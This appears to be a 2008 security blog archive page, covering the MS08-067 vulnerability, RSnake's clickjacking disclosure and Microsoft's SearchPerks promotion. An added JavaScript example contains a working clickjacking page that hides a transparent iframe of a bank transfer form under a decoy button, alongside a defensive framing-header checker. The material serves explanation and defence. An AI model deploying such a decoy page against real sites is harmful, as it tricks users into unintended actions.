Posts

Showing posts from October, 2008

MS08-067 Vulnerability in Server Service Could Allow Remote Code Execution

MSRC INFO Dennis Fisher gives a nice and simple breakdown of one piece of known malware targeting this vulnerability here. GD

In the News

ClickJack exploits (from Rsnake at ha.ckers.org) Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable - there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to the clickjacking PoC against Flash that was released today (watch the video for a good demonstration) that essentially spilled the beans regarding several of the findings that were most concerning. Thankfully, Adobe has been working on this since we let them know, so despite the careless disclosure, much of the work to mitigate this on their end is already complete. First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn't. Some overlays entire pages over a page, some uses iframes to get you to click on one spot. Som...
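The iframe variant RSnake describes above (get the victim to click one spot that actually belongs to a transparent framed page) is small enough to show in full. The following is an added example written for this page, not code from the ha.ckers.org post: it builds the attacker page, and it also goes beyond the excerpt by checking whether a target's response headers would stop the frame from loading at all, using the two header-based mitigations that have since become the standard defence (X-Frame-Options and CSP frame-ancestors). All URLs, origins and header values are constructed for illustration.

```javascript
// Added example (not from the ha.ckers.org post). Demonstrates the
// transparent-iframe clickjacking variant and a header check for the
// standard mitigations. All targets/origins/headers are constructed.

// Build the attacker page. A visible decoy button sits at (100,100); a
// transparent iframe of the target is shifted by (offsetX, offsetY) so the
// target's sensitive control lies directly under the decoy. The iframe has
// the higher z-index, so the click lands in the framed page, not on the decoy.
function buildClickjackPage(targetUrl, offsetX, offsetY) {
  const safeUrl = targetUrl.replace(/"/g, '&quot;');
  return [
    '<!doctype html><html><body>',
    '<button style="position:absolute;top:100px;left:100px;z-index:1">Claim prize</button>',
    '<iframe src="' + safeUrl + '" ' +
      'style="position:absolute;top:' + (100 - offsetY) + 'px;left:' + (100 - offsetX) + 'px;' +
      'width:800px;height:600px;opacity:0;z-index:2;border:0"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Decide whether a response carrying `headers` may be framed by a page at
// attackerOrigin. Returns true when framing is allowed, i.e. the page is
// exposed to this technique. Header names are matched case-insensitively.
function framingAllowed(headers, attackerOrigin, targetOrigin) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? null : headers[key];
  };
  const attacker = attackerOrigin.toLowerCase();
  const target = targetOrigin.toLowerCase();

  // CSP frame-ancestors, when present, takes precedence over X-Frame-Options.
  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      if (sources.includes('self') && attacker === target) return true;
      // Exact origin match only; host wildcards are out of scope here.
      return sources.includes(attacker);
    }
  }

  const xfo = get('x-frame-options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return attacker === target;
    if (v.startsWith('ALLOW-FROM ')) {
      return v.slice('ALLOW-FROM '.length).trim().toLowerCase() === attacker;
    }
    // Unrecognised value: browsers ignore it, so treat the page as unprotected.
    return true;
  }

  // No framing restriction at all.
  return true;
}

// Stand-alone usage with constructed data.
const attackerPage = buildClickjackPage('https://bank.example/transfer', 40, 20);
const unprotected = framingAllowed({}, 'https://evil.example', 'https://bank.example');
const protectedByXfo = framingAllowed(
  { 'X-Frame-Options': 'DENY' }, 'https://evil.example', 'https://bank.example');
console.log(attackerPage);
console.log('no headers framable:', unprotected, '| DENY framable:', protectedByXfo);
```

Note that a target with no framing restriction is framable from any origin, which is the state most sites were in when the post above was written; the check returns true in that case so the absence of a header reads as a finding rather than a pass.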

MS Pays you to search

Its latest edition is the Search Perks incentive, which joins Live Search Club, Search and Give, and Live Search Cashback promotions in recent months. Microsoft is getting a little trickier with its latest effort -- you not only have to use Microsoft's Live Search, but you also have to use its Internet Explorer Browser which is bad news for Firefox stalwarts. To join the promotion, users must download a small program. You can't download the program or view the true SearchPerks site from Firefox or Opera browsers. Once you get the program, it tracks your searching and gives you one ticket per search query. You can earn up to 25 tickets a day. In April, users can cash in the tickets for prizes or to give money to charity. Microsoft has not announced the prizes yet, but one of them might start with "V" and end with "ta" according to rumors.